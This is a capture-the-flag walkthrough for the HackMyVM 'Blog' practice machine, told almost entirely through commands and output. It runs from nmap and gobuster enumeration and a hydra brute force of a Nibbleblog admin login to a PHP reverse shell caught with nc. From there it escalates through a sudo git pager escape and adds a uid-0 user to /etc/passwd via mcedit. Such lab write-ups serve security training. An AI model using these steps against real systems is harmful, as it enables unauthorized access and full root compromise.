HackMyVm Blog Walkthrough

https://hackmyvm.eu/machines/machine.php?vm=Blog

Scan ports.

 nmap -sV -sC -p- -oN port.log 192.168.56.100
 Nmap scan report for furious.hmv (192.168.56.100)
 Host is up (0.0022s latency).
 Not shown: 65533 closed tcp ports (conn-refused)
 PORT   STATE SERVICE VERSION
 22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
 | ssh-hostkey: 
 |   2048 56:9b:dd:56:a5:c1:e3:52:a8:42:46:18:5e:0c:12:86 (RSA)
 |   256 1b:d2:cc:59:21:50:1b:39:19:77:1d:28:c0:be:c6:82 (ECDSA)
 |_  256 9c:e7:41:b6:ad:03:ed:f5:a1:4c:cc:0a:50:79:1c:20 (ED25519)
 80/tcp open  http    Apache httpd 2.4.38 ((Debian))
 |_http-title: Site doesn't have a title (text/html; charset=UTF-8).
 |_http-server-header: Apache/2.4.38 (Debian)
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Scan port 80.

 ~/D/blog $gobuster dir -u "http://192.168.56.100" -t 20 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt -b 401,403,404,500 --wildcard -o 80.log                         08:24:24
 ===============================================================
 /index.php            (Status: 200) [Size: 271]
 /my_weblog            (Status: 301) [Size: 320] [--> http://192.168.56.100/my_weblog/]

Scan my_weblog folder.

 /content              (Status: 301) [Size: 316] [--> http://blog.hmv/my_weblog/content/]
 /themes               (Status: 301) [Size: 315] [--> http://blog.hmv/my_weblog/themes/]
 /feed.php             (Status: 200) [Size: 993]
 /admin                (Status: 301) [Size: 314] [--> http://blog.hmv/my_weblog/admin/]
 /admin.php            (Status: 200) [Size: 1395]
 /index.php            (Status: 200) [Size: 4303]
 /plugins              (Status: 301) [Size: 316] [--> http://blog.hmv/my_weblog/plugins/]
 /README               (Status: 200) [Size: 902]
 /languages            (Status: 301) [Size: 318] [--> http://blog.hmv/my_weblog/languages/]
 /LICENSE.txt          (Status: 200) [Size: 35148]
 /COPYRIGHT.txt        (Status: 200) [Size: 1271]

README shows it's  Nibbleblog.

 ~/D/blog $curl "http://192.168.56.100/my_weblog/README"
 ====== Nibbleblog ======
 Version: Beta on Github
 Codename:
 Release date:
 
 Site: http://www.nibbleblog.com
 Blog: http://blog.nibbleblog.com
 ...

Add blog.hmv to /etc/hosts.

Brute force credentials of admin.

 ~/D/blog $hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64  blog.hmv http-post-form  "/my_weblog/admin.php:username=admin&password=^PASS^:Incorrect" -f -I
 ...
 [80][http-post-form] host: blog.hmv   login: admin   password: xxxxxx
 ...

Search exploit of Nibble

 ~/D/blog $searchsploit Nibbleblog                                    08:33:16
 ------------------------------------------- ---------------------------------
  Exploit Title                             |  Path
 ------------------------------------------- ---------------------------------
 Nibbleblog 3 - Multiple SQL Injections     | php/webapps/35865.txt
 Nibbleblog 4.0.3 - Arbitrary File Upload ( | php/remote/38489.rb
 ------------------------------------------- ---------------------------------

The upload module in Metasploit does no work, but we can do it by hand.

Upload reverse shell php in control  Admin Panel-->Myimage Plugin, then get rev shell.

 ~/D/blog $curl "http://blog.hmv/my_weblog/content/private/plugins/my_image/image.php"
 ─────────────────────────────────────────────────────────────────────────────────────────
 ~/D/blog $nc -nlvp 1234
 listening on [any] 1234 ...
 connect to [192.168.56.151] from (UNKNOWN) [192.168.56.100] 54256
 Linux blog 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
  15:30:47 up  4:34,  0 users,  load average: 0.00, 0.01, 0.00
 USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
 uid=33(www-data) gid=33(www-data) groups=33(www-data)
 

Following step are easy. Check sudo -l of www-data, and escalate to user admin.

 www-data@blog:/var/www/html/my_weblog$ sudo -l
 ...
 User www-data may run the following commands on blog:
     (admin) NOPASSWD: /usr/bin/git
 www-data@blog:/var/www/html/my_weblog$   sudo -u admin git -p help config
 :!/bin/bash
 admin@blog:/var/www/html/my_weblog$ id
 id
 uid=1000(admin) gid=1000(admin) groups=1000(admin)
 admin@blog:/var/www/html/my_weblog$ 

Then we can upload id_rsa.pub and get ssh login, if you want.

Check sudo -l of admin.

 admin@blog:~$ sudo -l
 sudo: unable to resolve host blog: Temporary failure in name resolution
 Matching Defaults entries for admin on blog:
     env_reset, mail_badpass,
     secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 
 User admin may run the following commands on blog:
     (root) NOPASSWD: /usr/bin/mcedit

Use mcedit to edit /etc/passwd, add new root user and password:root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash  , and we can get root.

 admin@blog:~$ su root2
 Password: 
 root@blog:/home/admin# id;hostname
 uid=0(root) gid=0(root) groups=0(root)
 blog